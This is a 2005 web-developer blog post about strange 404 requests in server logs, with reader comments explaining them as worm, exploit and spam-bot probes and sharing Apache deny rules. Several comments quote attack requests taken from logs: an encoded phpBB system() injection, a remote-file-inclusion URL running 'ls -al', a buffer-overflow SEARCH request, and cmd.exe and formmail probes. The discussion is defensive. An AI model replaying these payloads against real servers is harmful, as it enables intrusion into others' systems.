404 oddities

When I look at the server logs – or rather the list of “Required but not found URLs” that AWStats creates – for this site I find an increasing amount of very strange requests for nonexistent files. Since these weird requests are repeated over and over I’m guessing most of them are from bots looking for potential ways of hacking the site or posting spam.

That’s just a guess – I don’t know for sure what it’s all about. I’ve Googled around a bit and found reasonable explanations for some of the requests, but not all of them. Please fill me in if you know more about any of these oddities.

/cgi-bin/awstats.pl
Looking for a security hole in AWStats?
/awstats/awstats.pl
Probably the same as /cgi-bin/awstats.pl.
/_vti_bin/owssvr.dll
Requested by a “Web discussions” feature in IE/Win and probably by some worms looking for servers running Microsoft software. There are several discussions on this at Webmaster World.
/MSOffice/cltreq.asp
Same as /_vti_bin/owssvr.dll.
/_vti_inf.html
Someone trying to access the site with Frontpage?
/robotsxx.txt
Maybe you were looking for robots.txt?
/robot.txt
No, it’s robots with an ‘s’.
/333333, /444444, /666666
I think *every* document on this site has been requested multiple times with /333333, /444444 or /666666 added at the end of the URL. What are they looking for?
/css/{link}
No idea what this is.
/css/%7blink%7d
Nope, you won’t find any `blink` elements here.
abcdefghijklmn.htm
Umm?
/feed_main.xml^en^456
What’s with the circumflexes?
/favicon
You’ll have more luck if you add a file extension to that.

Have you found any other goodies in your server logs? Maybe something much weirder than any of the ones I’ve mentioned? Let’s compare!

Comments

1. April 5, 2005 by Renato Carvalho

hum...it's happened with me too. But i have no idea what is this =/

2. April 5, 2005 by Mike P.

I get most of those too, but this one has me stumped: /333333, /444444, /666666

What is that all about? I also get '/sumthin'. I (jokingly) figured it was some wiseass telling me to post something useful.

3. April 5, 2005 by paul haine

I get all of the above, and also /avatar.png for some reason. I have a blank robots.txt and a favicon.ico just because I was bored of seeing those two turn up in my 404s so often.

4. April 5, 2005 by Matthew Pennell

There are a few weird security sites that show up when you Google for /333333...

5. April 5, 2005 by Justin Perkins

If this is the first time you've looked at web server log files, I can see how this could be quite a suprise.

Since the webserver logs every single request that comes in on port 80 and this port is probably the most widely used, you get a lot of crap in your log files.

Most of the junk comes from zombie machines looking for other machines to infect, 99% of which are Windows machines.

An "fresh install" of Windows XP/2000 is extremely unsafe to connect to the Internet (without a firewall) because there is literally a constant flow of virii trying their best to spread their seed, most of which takes advantage of the fact that lots of Windows machines have a web server running by default.

That's why it's best to view your stats in a log analyzer, they exclude the bad requests from the reporting. I only open my log files if there is a problem or I'm trying to do some extra digging. My stats program (AWStats) reports the document requested that resulted in a 404 error, so I don't need to look at the log to figure it out.

6. April 5, 2005 by Jough

I get a LOT of seemingly random English words at the ends of 404 errors, and for the life of me I can't imagine how looking for "/noncapillary/" could be of any use to anyone.

I've thought of leaving messages for web hosts in a bad request when a site doesn't include contact info anywhere. But of course they'd have to actually read their logs to find it.

7. April 5, 2005 by Justin Perkins

Nice site Jough, thanks for that.

8. April 5, 2005 by Lukasz Grabun

I've noticed quite common request for /cgi-bin/formmail.cgi (or something alike, I could have missed the hyphen). Looking for security hole, apparently.

9. April 5, 2005 by Roger Johansson

Justin: I haven't been checking the actual log files - I use AWStats. Guess I could have made that clear in the post. The requests I mentioned are a sample of the 404 errors that get logged. I've been wondering about some of them for quite some time so I thought I'd check what you people have to say on the matter.

10. April 5, 2005 by Justin Perkins

Hmm, that's weird because I don't see any of that type of stuff in my reporting (AWStats). Most of the sites I check the stats on are subdomains though, so maybe I should take a gander at the root domain stats to see what they look like, as I am sure they are full of this garbage.

I was sure that the stats would filter out garbage, but possibly not from the 404 reports so you can better debug.

11. April 5, 2005 by Peter Parkes

I manage a site for Emmanuel College Students' Union, and we get loads of requests designed to exploit a (now fixed) security hole in phpBB, a popular bit of forum code, which look like this:

/forums/viewtopic.php?p=3014&highlight=%2527%252E system(chr(112)%252Echr(101)%252 Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)

Initially I was surprised you hadn't come across them, but it occurred to me that the crackers probably only hit you with the requests once they've established that you actually have a phpBB forum on the site.

12. April 5, 2005 by Ben Hollis

I get tons and tons of requests for inner pages of my sites with misspellings, for example http://www.numbera.com/rome/startegy/tools.aspx (note "startegy" instead of "strategy"), even though I can't imagine anyone typing in a URL like that.

13. April 5, 2005 by Brian

I get the "/vtibin/owssvr.dll" and "MSOffice/cltreq.asp" but nothing else interesting. Something keeps trying to access some old Atom feed I haven't had in a year.

14. April 5, 2005 by Dave P

I get them all too... they're all exploit attempts.

My guess on the 33333, 44444, 666666 404's is that they're trying to exploit a known buffer overflow vulnerability. It's probably from the NT 4 days, but I'm sure it still works on some out there.

15. April 5, 2005 by Johan Schurer

Usually many of those 404's come from worms, script-kiddies, saved pages, overcurious people and so on.

To tackle it I use the html-rewrite function in apache to rewrite all garbage 404's to a 0 size file named /youhaveaworm (or what you like).

Any further request is now logged in the access.log and the server 'sends' 0 bytes back saving bandwidth.

The only downside is you have to collect and put them in your apache config.

16. April 5, 2005 by Jonathan Snook

the formmail.cgi one is an older one where some hosts would have a default email script that spammers could (ab)use to mass mail.

Other than that, my 404s have actually been looking pretty clean as of late...

17. April 5, 2005 by Vasilis

I found this site that explains some of the errors.

18. April 5, 2005 by Simone Villas Boas

I love to send small, freak notes to some geek friends throught fake mispelled URLs. Something like "you-are-so-sexy,Joe" or "dont-talk-to-my-girl-again,pal". It's fun if you can see your friend's expression at the log analysis time. Unfortunally, it works only once. 8:*

19. April 6, 2005 by John Magnus

Have my share of these as well, especially requests for AWStats and phpbb. None of which have been installed on my server.

I also get a lot of request for FrontPage related stuff. Mostly direct request for "/vtibin/vtiaut/fp30reg.dll". Don't know if it's hack attempts or just misbehaving M$ software. Have had days with more than 100 requests for "vti_bin" related stuff, obviously a bit annoying...

Lastly there's the CodeRed variants with requests for either "/default.ida" or "/NULL.ida". Although not nearly as numerous as the one above, it's really annoying since it consumes a fair amount of bandwidth. Really makes me wish that people would look better after their computers...

20. April 6, 2005 by Charles Martin

My personal view on some of these, including awstats, is attempts by advertisers/spammers to isolate sites with high viewership. Thus, their blog comment spam and other nefarious ways are more effective and possibly strike a larger audience.

As a side comment, your example of "blink" as you called it:

/css/%7blink%7d

is actually the same /css/{link} just URL Encoded.

21. April 6, 2005 by gollux

/cgi-bin/awstats.pl Looking for a security hole in AWStats? /awstats/awstats.pl Probably the same as /cgi-bin/awstats.pl.

Bingo on the Security hole in AWStats, make sure you're up to the proper level. There was a Secunia notice on this.

22. April 6, 2005 by gregR

Details on the awstat exploit on ISC http://isc.sans.org/diary.php?date=2005-03-31 http://isc.sans.org/diary.php?date=2005-03-03 http://isc.sans.org/diary.php?date=2005-03-02

First time i see infocon with a colour different of Green BTW (06:13:44 GMT Apr 06 2005)

23. April 6, 2005 by Ben

This post made me smile.

:)

Then again, involving oddities is generally amusing.

24. April 6, 2005 by GrumpySimon

Welcome to the 'net folks. Most of these are likely to be some script kiddie scanning an ip range.

However, both AWstats and PhpBB have had some major security holes discovered recently (last few months). Make sure you've upgraded all your software (and php as well to 4.3.10 at least).

Peter Parkes: The phpBB exploit uses google to find vulnerable phpBB installations (IIRC it googles for a version number in the page footer).

As for the vti_bin ones - I just get apache to forbid (403) any requests there.

Another common scan to look out for is people checking to see if you're an open proxy. This basically comes in as a request for a big website like www.microsoft.com, www.intel.com or an open proxy checker on www.helllabs.com.

If anyone's interested, I'll post some Apache configuration directives to 403 them.

--Simon

25. April 6, 2005 by GrumpySimon

More info:

the abcdef... thing appears to be a scan from a bot in the Chinese ip range. It seems to be hammering sites looking for this page. Anyway, it doesn't seem to obey robots.txt, so kill it.

More info: ejhweb.com

The robotsxx.txt is a bot: PlantyNetWebRobotV1, out of hinet.com in Taiwan, and obviously doesn't obey bot rules. Ban it.

--Simon

26. April 6, 2005 by Tommy

I get lots of those as well, although I haven't seen the numeric ones yet. Lots of attempts to find formmail scripts, but then again, I know quite well spammers have found my blog. :(

I've had quite a few requests for /mobots.txt as well. A dyslexic spider? :)

27. April 6, 2005 by Jens Wedin

I have about the same as you do. Some other things that bug me.

The first post I wrote in my blog get really hit(3 times as much as my most popular post) by robots, not sure why.

Some hacker stuff:

  • /?p=http://www.geociNOTSPAMties.com/blackengine2004/ilustrator.txt?&cmd=ls%20-al

  • /phpmyadmin/css/phpmyadmin.css.php?lang=en-iso-8859-1&jsframe=right&jsisDOM=1

Nice to see what people really are doing at your site, the worrying thing is that you can never be sure if they have hacked the server. If they are goog, they would remove all their trace in the logs. Hopefully this has not happened. :D

PS. Had to add NOSPAM into the url so I could get around the spam filter on this blog.

28. April 6, 2005 by AndrewF

My site emails me with 'broken links'---404s where the referrer is my site.

I see a lot of spoofed-referrer attempts for "/cgi-bin/formmail.pl", and many, many variants (I don't have a cgi-bin directory).

The odd thing is that I rarely see requests for the same variant. Some examples: /cgi-bin/email_wm.cgi /cgi-bin/formmail.cgi /cgi-bin/cgiemail/form.mail /cgi-local/mail.cgi /cgi-bin/cgiemail/forms/order.txt

...and so on

29. April 6, 2005 by Robert Wellock

The most common Script Kiddie attack/requests I tend to receive daily are: "/cgi-bin/formmail.pl" from Thailand, Mexico, Africa and such places though obviously they must think I am stupid if they are looking for that file there.

Maybe they are short of money and would like a free spam-mail box. ;-)

Yes, I have seen such oddness as "/vtibin/owssvr.dll" or "/MSOffice/cltreq.asp" from what appears to be MSIE 6.0 on NT on a all too regular basis.

Also a few website site rippers get logged looking for weird directories on my Beck Site and last month a Novell Cache Server went berserk looking for a file I had sitting on my other server all along the thing was requesting every second for long periods of time...

Some odd results come from Agents looking for image files I have commented out in my CSS files using: /* url("image.jpg");*/ now that is peculiar.

I always tend to trace the IP ranges if they look suspect.

30. April 6, 2005 by Jeff Louella

I get this all the time on my FTP server also. I laugh at some of the attempted username and passwords they use.

31. April 6, 2005 by Henrik Lied

Inspired by this post, I went through my own server-logs and came over a lot of strange things. The top-five I assembled into a a blog post.

One difference from Roger's info is that my serverlogging-system prints out a few more things, for instance the IP-address and UA of the visitor.

32. April 6, 2005 by Roger Johansson

Charles: Ah, I missed that URL encoding. I guess "blink" stood out too much and caught my attention, eh ;-)

For those suggesting that AWStats should be updated to plug the security hole: thanks, I have that covered, plus the AWStats directory is named something else and requires a login and password to access.

Jens: Yeah sorry about that. It's an unfortunate side-effect of the measures I've taken to prevent comment spam.

GrumpySimon: Some of those Apache directives would be interesting, so please post them.

33. April 7, 2005 by Michael Newton

A couple of suggestions, if you're running Apache with some control over it:

1) tag bad requests using SetEnvIf. E.g. from people without User-Agent strings, or with fishy ones, and common script-kiddie attacks like the ones you mention above. 2) dump all these requests into a seperate log, so it's not in your main log cluttering things up and skewing your statistics. 3) deny the tagged requests access. 4) set up a virtual host with ServerName and block all requests on that vhost. How many legitimate visitors are going to visit your site by IP address?

This is how I do it. Works well for me. But then, my server is in my bedroom on a cable modem. Not so easy if you're buying hosting from someone!

34. April 7, 2005 by Jens Meiert

Well, know (some of) those errors, too. Another popular phenomenon causing errors are IRI modifications, of course (when people are guessing an IRI - some people e.g. try to access a "de" path on http://uitest.com/en/check/, and it currently really draws in IRI hackers).

However, I recommend to activate the "CheckSpelling" directive on Apache servers, which allows to correct some IRI spelling errors (for example, if someone forgets a letter or any character is just wrong). Simply add the following line to your .htaccess:

CheckSpelling On

Performance losses are usually minimal, but the benefits are high (happier users, happier error logs).

35. April 7, 2005 by Mark Reeves

I also get /sumthin. We get it from at least 3 different IP addresses 40 or 50 times a month usually in groups of 3 requests in close proximity.

Give it up already - you are getting nuthin!

36. April 7, 2005 by John Whittet

/index.com? That's an odd one...

37. April 7, 2005 by SugarKane

I get all the above and more. But, the ones that confuse me are things like: /pelikansio/makatea.htm .... the file name is correct but the directory does not exist and never has. I get a heap of these, with each non-existant directory having a nonsensical name. Who or what makes up these directory names?

38. April 8, 2005 by GrumpySimon

I use these commands in my httpd.conf. The first stops the CONNECT:1:3:3:7 attempt which is a scan to see if your server allows tunneling proxy servers (and is often used by spammers).

The second forbids any access to /cgi-bin/ and /vtibin/. I don't have anything in cgi-bin on my server, but you may need to allow this.

You can modify these (change the location bit) to include anything else which is getting requested often.

--Simon

#Stops those dodgy CONNECT:1:3:3:7 Scans and 403's them

   
      Order Deny,Allow
      Deny from all
   


# 403 all cgi-bin and _vti_bin requests

   Deny from all


   Deny from all

39. April 8, 2005 by GrumpySimon

Bah, eating my brackets.

#Stops those dodgy CONNECT:1:3:3:7 Scans and 403's them
<Location />
   <Limit CONNECT>
      Order Deny,Allow
      Deny from all
   </Limit>
</Location>

# 403 all cgi-bin and _vti_bin requests
<Location "/cgi-bin">
   Deny from all
</Location>
<Location "/_vti_bin">
   Deny from all
</Location>
40. April 8, 2005 by Roger Johansson

GrumpySimon: Thanks for sharing. I'll take a look at implementing that to clean things up.

Sorry about the preview eating your brackets. It's a long-standing problem with Movabletype that I don't know how to fix. I'd much appreciate any help with fixing that, so if anyone knows anything about it...

And to whoever is having fun sending me nice little messages by requesting non-existent files: I keep an eye on the list of 404 errors to detect any broken links or other problems. I also tend to add a redirect if someone posts a broken link to one of of my articles in a forum or on a mailing list. That happens quite a lot, actually. I figure it's better if I redirect those people to the document they are looking for instead of letting them end up on my 404 page. Getting rid of all the nonsense requests would make any such problems much easier to find.

41. April 9, 2005 by Joonas

In SugarKane's example /pelikansio/makatea.htm, the directory name is in fact a Finnish word. Its meaning is 'game folder' so it would make sense if someone had a directory named just that. Perhaps these bots are ripping directory names from other people's sites, although I can't really find any sense in doing that.

42. April 10, 2005 by Arve

Some oddities from my own logs:

  • /feeds/rss%22%20type=application/rss+xml%20rel=alternate%3E%3CLINK%20title=
  • /quark/archives/C:\Folder\file.txt
  • /archives/2005/04/submit-it-and-google-tos-violations/ - I have extensionless files, not directories. These requests seem to be made by a spam harvester, so I don't worry too much that they 404)
  • /gallery/css/rounded/Rounded%20Corners%20in%20CSS%20-%20Virtuelvis_files/top-right.png - some program seems to have problems with Save as.
  • /archives/http:
  • /feeds/bmrss%22%3ERSS%3C/A%3E)%3C/P%3E%0D%0A%3CH3%3E%3CA%20href= - most likely some attempt at using my feeds as a redirector, something which will fail horribly.
43. April 10, 2005 by Ryan B

The general css/{link} request can be a result of people exploring your css (I am guilty of this). In Safari you can open the activity viewer and double click a css file to view it. Safari opens the css file in a new window resulting in a direct request for said file; therefore the server records that as a request (just wanted to make it clear). There is a technique out there to hide css from direct access, I believe php was used and it would give a message like "thanks for taking interest in my css..."when you try to access it. But for the life of me or about 30 mins I can't find the blog. The blog also features a content shadow technique that was impressive. Dark blue and red color scheme if anybody know ;-)

44. April 11, 2005 by Stefano

Maybe is due to some spam programs... When you get a 404 is displayed the email of the owner of the site.

45. April 12, 2005 by guest

me too~!

46. May 1, 2005 by Lansing

I'm running my webserver on a linux box, however that doesn't stop all those skiddies from trying to get a 'cmd.exe' shell. Sadly, it isn't just once or twice, it is HUNDREDS of times.

47. May 10, 2005 by Vincent Grouls

Maybe is due to some spam programs... When you get a 404 is displayed the email of the owner of the site.

This is an option in the Apache configuration. You can disable it for every Virtual Host or globally. The directive is named ServerSignature. Set it to On or Off instead of Email.

I used to get a lot of request from hinet.com on port 25 but since I've blocked them they haven't returned :=D

Anyone ever come across this one though?

[07/May/2005:11:55:46 +0100] "SEARCH /\x90\xc9\xc9\xc9\xc9\xc9\xc9\xc9\xc9\xc9\xc9\xc9\xc9\xc9...

It goes on for another 300 characters...

[Edit: Removed a very long line. /Roger]

48. August 3, 2005 by Jack Vinson

I've noticed an entertaining 404 error in my logs recently: A robot of some sort is trying to access a valid URL, but they've surrounded one of the words in the file name with HTML markup. Thus far it's only been the bold markup. I can write an .htaccess directive to strip the markup - should I?

Sorry, comments are closed for this post.

Information, sponsorship, and externals

About the author

Roger Johansson is a Swedish web professional specialising in web standards, accessibility, and usability. More about me and this site.

Subscribe

Looking for web hosting?

Try DreamHost!

Use the promo code 456BEREASTREET3 to save USD 20 when you sign up!

Latest articles

Validation statistics from Nikita the Spider Comments off
An analysis of the sites crawled by the bulk validation tool Nikita the Spider during March 2008.
Authentic Jobs API and Affiliates program Comments off
The Authentic Jobs job listing service now has a public API and an affiliate program.
What does Acid3 mean to you and me? Comments off
Opera and Apple have announced that their web browsers pass the Acid3 Browser Test, but how will that help web designers and developers?
Designing Web Navigation (Book review) Comments off
Learn the fundamentals of navigation design and design better navigation systems for large and small sites as well as for web based applications.
DOMAssistant bundle for TextMate Comments off
To save keystrokes and speed up development I have created a DOMAssistant bundle for TextMate.
First impressions of Internet Explorer 8 Beta 1 Comments off
My impressions after trying out Internet Explorer 8 Beta 1 for a couple of days.

More articles

Favourites, here and elsewhere

Affiliation

  • NetRelations
  • Kaffesnobben
  • Dagens recept
  • 9rules network member

Support this site

Show your support by buying a book or two from SitePoint or getting me something from my Amazon Wish List.